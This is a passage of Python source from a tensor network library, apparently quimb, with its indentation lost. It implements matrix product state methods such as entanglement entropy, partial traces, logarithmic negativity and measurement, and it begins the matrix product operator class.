If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
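        Examples
        --------
        A minimal sketch, assuming ``MPS_rand_state`` from ``quimb.tensor``
        (illustrative only)::
            psi = MPS_rand_state(10, bond_dim=7)
            S = psi.entropy(5)  # entanglement entropy of the half-chain cut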
"""
if self.cyclic:
msg = ("For cyclic systems, try explicitly computing the entropy "
"of the (compressed) reduced density matrix.")
raise NotImplementedError(msg)
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
S = S[S > 0.0]
return do('sum', -S * do('log2', S))
def schmidt_gap(self, i, cur_orthog=None, method='svd'):
"""The schmidt gap of bipartition between the left block of ``i`` sites
and the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
raise NotImplementedError
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
if len(S) == 1:
return S[0]
return S[0] - S[1]
def partial_trace(self, keep, upper_ind_id="b{}", rescale_sites=True):
r"""Partially trace this matrix product state, producing a matrix
product operator.
Parameters
----------
keep : sequence of int or slice
            Indices of the sites to keep.
upper_ind_id : str, optional
The ind id of the (new) 'upper' inds, i.e. the 'bra' inds.
rescale_sites : bool, optional
If ``True`` (the default), then the kept sites will be rescaled to
``(0, 1, 2, ...)`` etc. rather than keeping their original site
numbers.
Returns
-------
rho : MatrixProductOperator
The density operator in MPO form.
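        Examples
        --------
        A rough sketch of forming the reduced density operator of sites 2 and
        3, assuming ``MPS_rand_state`` from ``quimb.tensor`` (illustrative
        only)::
            psi = MPS_rand_state(8, bond_dim=6)
            rho = psi.partial_trace([2, 3])
            rho.trace()  # ~1.0 for a normalized state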
"""
p_bra = self.copy()
p_bra.reindex_sites_(upper_ind_id, where=keep)
rho = self.H & p_bra
# now have e.g:
# | | | |
# o-o-o-o-o-o-o-o-o
# | | | | |
# o-o-o-o-o-o-o-o-o
# | | | |
if isinstance(keep, slice):
keep = self.slice2sites(keep)
keep = sorted(keep)
for i in self.gen_site_coos():
if i in keep:
# |
# -o- |
# ... -o- ... -> ... -O- ...
# i| i|
rho ^= self.site_tag(i)
else:
# |
# -o-o- |
# ... | ... -> ... -OO- ...
# -o-o- |i+1
# i |i+1
if i < self.L - 1:
rho >>= [self.site_tag(i), self.site_tag(i + 1)]
else:
rho >>= [self.site_tag(i), self.site_tag(max(keep))]
rho.drop_tags(self.site_tag(i))
# if single site a single tensor is produced
if isinstance(rho, Tensor):
rho = TensorNetwork([rho])
if rescale_sites:
# e.g. [3, 4, 5, 7, 9] -> [0, 1, 2, 3, 4]
retag, reind = {}, {}
for new, old in enumerate(keep):
retag[self.site_tag(old)] = self.site_tag(new)
reind[self.site_ind(old)] = self.site_ind(new)
reind[upper_ind_id.format(old)] = upper_ind_id.format(new)
rho.retag_(retag)
rho.reindex_(reind)
L = len(keep)
else:
L = self.L
# transpose upper and lower tags to match other MPOs
rho.view_as_(
MatrixProductOperator,
cyclic=self.cyclic, L=L, site_tag_id=self.site_tag_id,
lower_ind_id=upper_ind_id, upper_ind_id=self.site_ind_id, )
rho.fuse_multibonds(inplace=True)
return rho
def ptr(self, keep, upper_ind_id="b{}", rescale_sites=True):
"""Alias of :meth:`~quimb.tensor.MatrixProductState.partial_trace`.
"""
return self.partial_trace(keep, upper_ind_id,
rescale_sites=rescale_sites)
def bipartite_schmidt_state(self, sz_a, get='ket', cur_orthog=None):
r"""Compute the reduced state for a bipartition of an OBC MPS, in terms
of the minimal left/right schmidt basis::
A B
......... ...........
>->->->->--s--<-<-<-<-<-< -> +-s-+
| | | | | | | | | | | | |
k0 k1... kA kB
Parameters
----------
sz_a : int
            The number of sites in subsystem A, must be ``0 < sz_a < L``.
get : {'ket', 'rho', 'ket-dense', 'rho-dense'}, optional
Get the:
- 'ket': vector form as tensor.
- 'rho': density operator form, i.e. vector outer product
- 'ket-dense': like 'ket' but return ``qarray``.
- 'rho-dense': like 'rho' but return ``qarray``.
cur_orthog : int, optional
If given, take as the current orthogonality center so as to
            efficiently move it a minimal distance.
"""
if self.cyclic:
raise NotImplementedError("MPS must have OBC.")
s = do('diag', self.singular_values(sz_a, cur_orthog=cur_orthog))
if 'dense' in get:
kd = qu.qarray(s.reshape(-1, 1))
if 'ket' in get:
return kd
elif 'rho' in get:
return kd @ kd.H
else:
k = Tensor(s, (self.site_ind('A'), self.site_ind('B')))
if 'ket' in get:
return k
elif 'rho' in get:
return k & k.reindex({'kA': 'bA', 'kB': 'bB'})
@staticmethod
def _do_lateral_compress(mps, kb, section, leave_short, ul, ll, heps,
hmethod, hmax_bond, verbosity, compressed,
**compress_opts):
# section
# ul -o-o-o-o-o-o-o-o-o- ul -\ /-
# | | | | | | | | | ==> 0~~~~~0
# ll -o-o-o-o-o-o-o-o-o- ll -/ : \-
# hmax_bond
if leave_short:
# if section is short doesn't make sense to lateral compress
# work out roughly when this occurs by comparing bond size
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if mps.phys_dim() ** len(section) <= left_sz * right_sz:
if verbosity >= 1:
print(f"Leaving lateral compress of section '{section}' as"
f" it is too short: length={len(section)}, eff "
f"size={left_sz * right_sz}.")
return
if verbosity >= 1:
print(f"Laterally compressing section {section}. Using options: "
f"eps={heps}, method={hmethod}, max_bond={hmax_bond}")
section_tags = map(mps.site_tag, section)
kb.replace_with_svd(section_tags, (ul, ll), heps, inplace=True,
ltags='_LEFT', rtags='_RIGHT', method=hmethod,
max_bond=hmax_bond, **compress_opts)
compressed.append(section)
@staticmethod
def _do_vertical_decomp(mps, kb, section, sysa, sysb, compressed, ul, ur,
ll, lr, vmethod, vmax_bond, veps, verbosity,
**compress_opts):
if section == sysa:
label = 'A'
elif section == sysb:
label = 'B'
else:
return
section_tags = [mps.site_tag(i) for i in section]
if section in compressed:
# ----U---- | <- vmax_bond
# -\ /- / ----U----
# L~~~~R ==> \ ==>
# -/ \- / ----D----
# ----D---- | <- vmax_bond
# try and choose a sensible method
if vmethod is None:
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if left_sz * right_sz <= 2**13:
# cholesky is not rank revealing
vmethod = 'eigh' if vmax_bond else 'cholesky'
else:
vmethod = 'isvd'
if verbosity >= 1:
print(f"Performing vertical decomposition of section {label}, "
f"using options: eps={veps}, method={vmethod}, "
f"max_bond={vmax_bond}.")
# do vertical SVD
kb.replace_with_svd(
section_tags, (ul, ur), right_inds=(ll, lr), eps=veps,
ltags='_UP', rtags='_DOWN', method=vmethod, inplace=True,
max_bond=vmax_bond, **compress_opts)
# cut joined bond by reindexing to upper- and lower- ind_id.
kb.cut_between((mps.site_tag(section[0]), '_UP'),
(mps.site_tag(section[0]), '_DOWN'),
f"_tmp_ind_u{label}",
f"_tmp_ind_l{label}")
else:
# just unfold and fuse physical indices:
# |
# -A-A-A-A-A-A-A- -AAAAAAA-
# | | | | | | | ===>
# -A-A-A-A-A-A-A- -AAAAAAA-
# |
if verbosity >= 1:
print(f"Just vertical unfolding section {label}.")
kb, sec = kb.partition(section_tags, inplace=True)
sec_l, sec_u = sec.partition('_KET', inplace=True)
T_UP = (sec_u ^ all)
T_UP.add_tag('_UP')
T_UP.fuse_({f"_tmp_ind_u{label}":
[mps.site_ind(i) for i in section]})
T_DN = (sec_l ^ all)
T_DN.add_tag('_DOWN')
T_DN.fuse_({f"_tmp_ind_l{label}":
[mps.site_ind(i) for i in section]})
kb |= T_UP
kb |= T_DN
def partial_trace_compress(self, sysa, sysb, eps=1e-8,
method=('isvd', None), max_bond=(None, 1024),
leave_short=True, renorm=True,
lower_ind_id='b{}', verbosity=0,
**compress_opts):
r"""Perform a compressed partial trace using singular value
lateral then vertical decompositions of transfer matrix products::
.....sysa...... ...sysb....
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
==> form inner product
............... ...........
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
==> lateral SVD on each section
.....sysa...... ...sysb....
/\ /\ /\ /\
... ~~~E A~~~~~~~~~~~A E~E B~~~~~~~B E~~~ ...
\/ \/ \/ \/
==> vertical SVD and unfold on A & B
| |
/-------A-------\ /-----B-----\
... ~~~E E~E E~~~ ...
\-------A-------/ \-----B-----/
| |
With various special cases including OBC or end spins included in
        subsystems.
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float or (float, float), optional
Tolerance(s) to use when compressing the subsystem transfer
matrices and vertically decomposing.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
            vertically compressing subsystems.
max_bond : int or (int, int), optional
The maximum bond to keep for laterally compressing the state then
            vertically compressing subsystems.
leave_short : bool, optional
If True (the default), don't try to compress short sections.
renorm : bool, optional
            If True (the default), renormalize the state so that ``tr(rho)==1``.
lower_ind_id : str, optional
The index id to create for the new density matrix, the upper_ind_id
is automatically taken as the current site_ind_id.
compress_opts : dict, optional
            Supplied to the lateral and vertical decompositions to govern how
            singular values are treated. See ``tensor_split``.
verbosity : {0, 1}, optional
How much information to print while performing the compressed
partial trace.
Returns
-------
rho_ab : TensorNetwork
Density matrix tensor network with
``outer_inds = ('k0', 'k1', 'b0', 'b1')`` for example.
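        Examples
        --------
        A rough sketch for a periodic chain, assuming ``MPS_rand_state`` from
        ``quimb.tensor`` (all parameters here are illustrative only)::
            psi = MPS_rand_state(30, bond_dim=8, cyclic=True)
            rho_ab = psi.partial_trace_compress(
                sysa=range(5, 10), sysb=range(15, 20), max_bond=(50, 256))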
"""
N = self.L
if (len(sysa) + len(sysb) == N) and not self.cyclic:
return self.bipartite_schmidt_state(len(sysa), get='rho')
# parse horizontal and vertical svd tolerances and methods
try:
heps, veps = eps
except (ValueError, TypeError):
heps = veps = eps
try:
hmethod, vmethod = method
except (ValueError, TypeError):
hmethod = vmethod = method
try:
hmax_bond, vmax_bond = max_bond
except (ValueError, TypeError):
hmax_bond = vmax_bond = max_bond
# the sequence of sites in each of the 'environment' sections
envm = range(max(sysa) + 1, min(sysb))
envl = range(0, min(sysa))
envr = range(max(sysb) + 1, N)
# spread norm, and if not cyclic put in mixed canonical form, taking
# care that the orthogonality centre is in right place to use identity
k = self.copy()
k.left_canonize()
k.right_canonize(max(sysa) + (bool(envm) or bool(envr)))
# form the inner product
b = k.conj()
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k | b
# label the various partitions
names = ('_ENVL', '_SYSA', '_ENVM', '_SYSB', '_ENVR')
for name, where in zip(names, (envl, sysa, envm, sysb, envr)):
if where:
kb.add_tag(name, where=map(self.site_tag, where), which='any')
if self.cyclic:
# can combine right and left envs
sections = [envm, sysa, sysb, (*envr, *envl)]
else:
sections = [envm]
# if either system includes end, can ignore and use identity
if 0 not in sysa:
sections.append(sysa)
if N - 1 not in sysb:
sections.append(sysb)
# ignore empty sections
sections = list(filter(len, sections))
# figure out the various indices
ul_ur_ll_lrs = []
for section in sections:
# ...section[i]....
# ul[i] -o-o-o-o-o-o-o-o-o- ur[i]
# | | | | | | | | |
# ll[i] -o-o-o-o-o-o-o-o-o- lr[i]
st_left = self.site_tag(section[0] - 1)
st_right = self.site_tag(section[0])
ul, = bonds(kb['_KET', st_left], kb['_KET', st_right])
ll, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
st_left = self.site_tag(section[-1])
st_right = self.site_tag(section[-1] + 1)
ur, = bonds(kb['_KET', st_left], kb['_KET', st_right])
lr, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
ul_ur_ll_lrs.append((ul, ur, ll, lr))
# lateral compress sections if long
compressed = []
for section, (ul, _, ll, _) in zip(sections, ul_ur_ll_lrs):
self._do_lateral_compress(self, kb, section, leave_short, ul, ll,
heps, hmethod, hmax_bond, verbosity,
compressed, **compress_opts)
# vertical compress and unfold system sections only
for section, (ul, ur, ll, lr) in zip(sections, ul_ur_ll_lrs):
self._do_vertical_decomp(self, kb, section, sysa, sysb, compressed,
ul, ur, ll, lr, vmethod, vmax_bond, veps,
verbosity, **compress_opts)
if not self.cyclic:
# check if either system is at end, and thus reduces to identities
#
# A-A-A-A-A-A-A-m-m-m- \-m-m-m-
# | | | | | | | | | | ... ==> | | | ...
# A-A-A-A-A-A-A-m-m-m- /-m-m-m-
#
if 0 in sysa:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_LEFT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[0])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[0])]
else:
TU = kb['_SYSB', '_UP']
TD = kb['_SYSB', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysa[-1])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysa[-1])].bonds(TD)
# delete the A system
kb.delete('_SYSA')
kb.reindex_({ubnd: "_tmp_ind_uA", lbnd: "_tmp_ind_lA"})
else:
# or else replace the left or right envs with identites since
#
# >->->->-A-A-A-A- +-A-A-A-A-
# | | | | | | | | ... ==> | | | | |
# >->->->-A-A-A-A- +-A-A-A-A-
#
kb.replace_with_identity('_ENVL', inplace=True)
if N - 1 in sysb:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_RIGHT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[-1])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[-1])]
else:
TU = kb['_SYSA', '_UP']
TD = kb['_SYSA', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysb[0])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysb[0])].bonds(TD)
# delete the B system
kb.delete('_SYSB')
kb.reindex_({ubnd: "_tmp_ind_uB", lbnd: "_tmp_ind_lB"})
else:
kb.replace_with_identity('_ENVR', inplace=True)
kb.reindex_({
'_tmp_ind_uA': self.site_ind('A'),
'_tmp_ind_lA': lower_ind_id.format('A'),
'_tmp_ind_uB': self.site_ind('B'),
'_tmp_ind_lB': lower_ind_id.format('B'),
})
if renorm:
# normalize
norm = kb.trace(['kA', 'kB'], ['bA', 'bB'])
ts = []
tags = kb.tags
# check if we have system A
if '_SYSA' in tags:
ts.extend(kb[sysa[0]])
# check if we have system B
if '_SYSB' in tags:
ts.extend(kb[sysb[0]])
            # If we don't have either (OBC with both at ends) use middle envm
if len(ts) == 0:
ts.extend(kb[envm[0]])
nt = len(ts)
if verbosity > 0:
print(f"Renormalizing for norm {norm} among {nt} tensors.")
# now spread the norm out among tensors
for t in ts:
t.modify(data=t.data / norm**(1 / nt))
return kb
def logneg_subsys(self, sysa, sysb, compress_opts=None,
approx_spectral_opts=None, verbosity=0,
approx_thresh=2**12):
r"""Compute the logarithmic negativity between subsytem blocks, e.g.::
sysa sysb
......... .....
... -o-o-o-o-o-o-A-A-A-A-A-o-o-o-B-B-B-o-o-o-o-o-o-o- ...
| | | | | | | | | | | | | | | | | | | | | | | |
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float, optional
Tolerance to use when compressing the subsystem transfer matrices.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
            vertically compressing subsystems.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
approx_spectral_opts
Supplied to :func:`~quimb.approx_spectral_function`.
Returns
-------
ln : float
The logarithmic negativity.
See Also
--------
MatrixProductState.partial_trace_compress, approx_spectral_function
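        Examples
        --------
        A rough sketch for two blocks of an open chain, assuming
        ``MPS_rand_state`` from ``quimb.tensor`` (illustrative only)::
            psi = MPS_rand_state(16, bond_dim=16)
            ln = psi.logneg_subsys(sysa=range(2, 5), sysb=range(7, 10))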
"""
if not self.cyclic and (len(sysa) + len(sysb) == self.L):
# pure bipartition with OBC
psi = self.bipartite_schmidt_state(len(sysa), get='ket-dense')
d = round(psi.shape[0]**0.5)
return qu.logneg(psi, [d, d])
compress_opts = ensure_dict(compress_opts)
approx_spectral_opts = ensure_dict(approx_spectral_opts)
# set the default verbosity for each method
compress_opts.setdefault('verbosity', verbosity)
approx_spectral_opts.setdefault('verbosity', verbosity)
# form the compressed density matrix representation
rho_ab = self.partial_trace_compress(sysa, sysb, **compress_opts)
# view it as an operator
rho_ab_pt_lo = rho_ab.aslinearoperator(['kA', 'bB'], ['bA', 'kB'])
if rho_ab_pt_lo.shape[0] <= approx_thresh:
tr_norm = norm_trace_dense(rho_ab_pt_lo.to_dense(), isherm=True)
else:
# estimate its spectrum and sum the abs(eigenvalues)
tr_norm = qu.approx_spectral_function(
rho_ab_pt_lo, abs, **approx_spectral_opts)
# clip below 0
return max(0, log2(tr_norm))
def measure(
self,
site,
remove=False,
outcome=None,
renorm=True,
cur_orthog=None,
get=None,
inplace=False,
):
r"""Measure this MPS at ``site``, including projecting the state.
Optionally remove the site afterwards, yielding an MPS with one less
site. In either case the orthogonality center of the returned MPS is
``min(site, new_L - 1)``.
Parameters
----------
site : int
The site to measure.
remove : bool, optional
Whether to remove the site completely after projecting the
measurement. If ``True``, sites greater than ``site`` will be
            retagged and reindexed one down, and the MPS will have one less site.
E.g::
0-1-2-3-4-5-6
/ / / - measure and remove site 3
0-1-2-4-5-6
- reindex sites (4, 5, 6) to (3, 4, 5)
0-1-2-3-4-5
outcome : None or int, optional
Specify the desired outcome of the measurement. If ``None``, it
will be randomly sampled according to the local density matrix.
renorm : bool, optional
Whether to renormalize the state post measurement.
cur_orthog : None or int, optional
If you already know the orthogonality center, you can supply it
            here for efficiency's sake.
get : {None, 'outcome'}, optional
If ``'outcome'``, simply return the outcome, and don't perform any
projection.
inplace : bool, optional
Whether to perform the measurement in place or not.
Returns
-------
outcome : int
The measurement outcome, drawn from ``range(phys_dim)``.
psi : MatrixProductState
The measured state, if ``get != 'outcome'``.
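        Examples
        --------
        A minimal sketch, assuming ``MPS_rand_state`` from ``quimb.tensor``
        (illustrative only)::
            psi = MPS_rand_state(8, bond_dim=4)
            outcome, psi = psi.measure(3)               # project site 3
            outcome, psi = psi.measure(5, remove=True)  # now a 7-site MPS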
"""
if self.cyclic:
raise ValueError('Not supported on cyclic MPS yet.')
tn = self if inplace else self.copy()
L = tn.L
d = self.phys_dim(site)
# make sure MPS is canonicalized
if cur_orthog is not None:
tn.shift_orthogonality_center(cur_orthog, site)
else:
tn.canonize(site)
# local tensor and physical dim
t = tn[site]
ind = tn.site_ind(site)
# diagonal of reduced density matrix = probs
tii = t.contract(t.H, output_inds=(ind,))
p = do('real', tii.data)
if outcome is None:
# sample an outcome
outcome = do('random.choice', do('arange', d, like=p), p=p)
if get == 'outcome':
return outcome
# project the outcome and renormalize
t.isel_({ind: outcome})
if renorm:
t.modify(data=t.data / p[outcome]**0.5)
if remove:
# contract the projected tensor into neighbor
if site == L - 1:
tn ^= slice(site - 1, site + 1)
else:
tn ^= slice(site, site + 2)
# adjust structure for one less spin
for i in range(site + 1, L):
tn[i].reindex_({tn.site_ind(i): tn.site_ind(i - 1)})
tn[i].retag_({tn.site_tag(i): tn.site_tag(i - 1)})
tn._L = L - 1
else:
# simply re-expand tensor dimensions (with zeros)
t.new_ind(ind, size=d, axis=-1)
return outcome, tn
measure_ = functools.partialmethod(measure, inplace=True)
class MatrixProductOperator(TensorNetwork1DOperator,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product operator, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPO.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrud' (the default)
        indicates the shape corresponds to left-bond, right-bond, 'up' physical
index, 'down' physical index.
End tensors have either 'l' or 'r' dropped from the string.
upper_ind_id : str
        A string specifying how to label the upper physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(upper_ind_id.format, range(len(arrays)))``.
lower_ind_id : str
        A string specifying how to label the lower physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(lower_ind_id.format, range(len(arrays)))``.
site_tag_id : str
        A string specifying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, shape='lrud', site_tag_id='I{}', tags=None,
upper_ind_id='k{}', lower_ind_id='b{}', bond_name="",
**tn_opts):
# short-circuit for copying
if isinstance(arrays, MatrixProductOperator):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._upper_ind_id = upper_ind_id
self._lower_ind_id = lower_ind_id
upper_inds = map(upper_ind_id.format, range(self.L))
lower_inds = map(lower_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
if isinstance(tags, str):
tags = (tags,)
else:
tags = tuple(tags)
site_tags = tuple((st,) + tags for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 4)
# transpose arrays to 'lrud' order.
def gen_orders():
lud_ord = tuple(shape.replace('r', "").find(x) for x in 'lud')
rud_ord = tuple(shape.replace('l', "").find(x) for x in 'rud')
lrud_ord = tuple(map(shape.find, 'lrud'))
yield rud_ord if not self.cyclic else lrud_ord
for _ in range(self.L - 2):
yield lrud_ord
yield lud_ord if not self.cyclic else lrud_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield (*cyc_bond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
yield (pbond, *cyc_bond, next(upper_inds), next(lower_inds))
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, ham, dims, upper_ind_id='k{}',
lower_ind_id='b{}', site_tag_id='I{}',
**split_opts):
"""Create a ``MatrixProductOperator`` directly from a dense vector
Parameters
----------
ham : array_like
The dense operator to convert to MPO from.
dims : sequence of int
Physical subsystem dimensions of each site.
upper_ind_id : str
How to index the upper sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
lower_ind_id : str
How to index the lower sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
site_tag_id : str
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
split_opts
            Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` in
            order to partition the dense operator into tensors.
Returns
-------
MatrixProductOperator
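        Examples
        --------
        A rough sketch, building an MPO from a small dense Heisenberg
        Hamiltonian generated with ``qu.ham_heis`` (illustrative only)::
            H = qu.ham_heis(4, sparse=False)
            A = MatrixProductOperator.from_dense(H, dims=[2] * 4)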
"""
set_default_compress_mode(split_opts)
L = len(dims)
upper_inds = [upper_ind_id.format(i) for i in range(L)]
lower_inds = [lower_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(ham), dims+dims),
inds = upper_inds + lower_inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=upper_inds[:i]+lower_inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
upper_ind_id=upper_ind_id,
lower_ind_id=lower_ind_id,
site_tag_id=site_tag_id)
def add_MPO(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPO with another of different length."
f"Got lengths {self.L} and {other.L}")
summed = self if inplace else self.copy()
for i in summed.gen_site_coos():
t1, t2 = summed[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
if i < summed.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
t2 = t2.reindex(reindex_map)
sum_inds = (summed.upper_ind(i), summed.lower_ind(i))
t1.direct_product_(t2, sum_inds=sum_inds)
if compress:
summed.compress(**compress_opts)
return summed
add_MPO_ = functools.partialmethod(add_MPO, inplace=True)
_apply_mps = tensor_network_apply_op_vec
def _apply_mpo(self, other, compress=False, **compress_opts):
A, B = self.copy(), other.copy()
# align the indices and combine into a ladder
A.upper_ind_id = B.upper_ind_id
B.upper_ind_id = "__tmp{}__"
A.lower_ind_id = "__tmp{}__"
AB = A | B
# contract each pair of tensors at each site
for i in range(A.L):
AB ^= A.site_tag(i)
# convert back to MPO and fuse the double bonds
AB.view_as_(
MatrixProductOperator,
upper_ind_id=A.upper_ind_id,
lower_ind_id=B.lower_ind_id,
cyclic=self.cyclic,
)
AB.fuse_multibonds_()
# optionally compress
if compress:
AB.compress(**compress_opts)
return AB
def apply(self, other, compress=False, **compress_opts):
r"""Act with this MPO on another MPO or MPS, such that the resulting
object has the same tensor network structure/indices as ``other``.
For an MPS::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
-->
| | | | | | | | | | | | | | | | | | <- other.site_ind_id
out: y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y
For an MPO::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B
| | | | | | | | | | | | | | | | | |
-->
| | | | | | | | | | | | | | | | | | <- other.upper_ind_id
out: C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C
| | | | | | | | | | | | | | | | | | <- other.lower_ind_id
The resulting TN will have the same structure/indices as ``other``, but
probably with larger bonds (depending on compression).
Parameters
----------
other : MatrixProductOperator or MatrixProductState
The object to act on.
compress : bool, optional
Whether to compress the resulting object.
compress_opts
Supplied to :meth:`TensorNetwork1DFlat.compress`.
Returns
-------
MatrixProductOperator or MatrixProductState
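        Examples
        --------
        A rough sketch of acting on an MPS and compressing the result,
        assuming ``MPO_ham_heis`` and ``MPS_rand_state`` from
        ``quimb.tensor`` (illustrative only)::
            H = MPO_ham_heis(20)
            psi = MPS_rand_state(20, bond_dim=8)
            Hpsi = H.apply(psi, compress=True, max_bond=32)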
"""
if isinstance(other, MatrixProductState):
return self._apply_mps(other, compress=compress, **compress_opts)
elif isinstance(other, MatrixProductOperator):
return self._apply_mpo(other, compress=compress, **compress_opts)
else:
raise TypeError("Can only Dot with a MatrixProductOperator or a "
f"MatrixProductState, got {type(other)}")
dot = apply
def permute_arrays(self, shape='lrud'):
"""Permute the indices of each tensor in this MPO to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrud'`` specifying the desired order of the
left, right, upper and lower (down) indices respectively.
"""
for i in self.sites:
inds = {'u': self.upper_ind(i), 'd': self.lower_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def trace(self, left_inds=None, right_inds=None):
"""Take the trace of this MPO.
"""
if left_inds is None:
left_inds = map(self.upper_ind, self.gen_site_coos())
if right_inds is None:
right_inds = map(self.lower_ind, self.gen_site_coos())
return super().trace(left_inds, right_inds)
def partial_transpose(self, sysa, inplace=False):
"""Perform the partial transpose on this MPO by swapping the bra and
ket indices on sites in ``sysa``.
Parameters
----------
sysa : sequence of int or int
The sites to transpose indices on.
inplace : bool, optional
Whether to perform the partial transposition inplace.
Returns
-------
MatrixProductOperator
"""
tn = self if inplace else self.copy()
if isinstance(sysa, Integral):
sysa = (sysa,)
tmp_ind_id = "__tmp_{}__"
tn.reindex_({tn.upper_ind(i): tmp_ind_id.format(i) for i in sysa})
tn.reindex_({tn.lower_ind(i): tn.upper_ind(i) for i in sysa})
tn.reindex_({tmp_ind_id.format(i): tn.lower_ind(i) for i in sysa})
return tn
def __add__(self, other):
"""MPO addition.
"""
return self.add_MPO(other, inplace=False)
def __iadd__(self, other):
"""In-place MPO addition.
"""
return self.add_MPO(other, inplace=True)
def __sub__(self, other):
"""MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=False)
def __isub__(self, other):
"""In-place MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=True)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
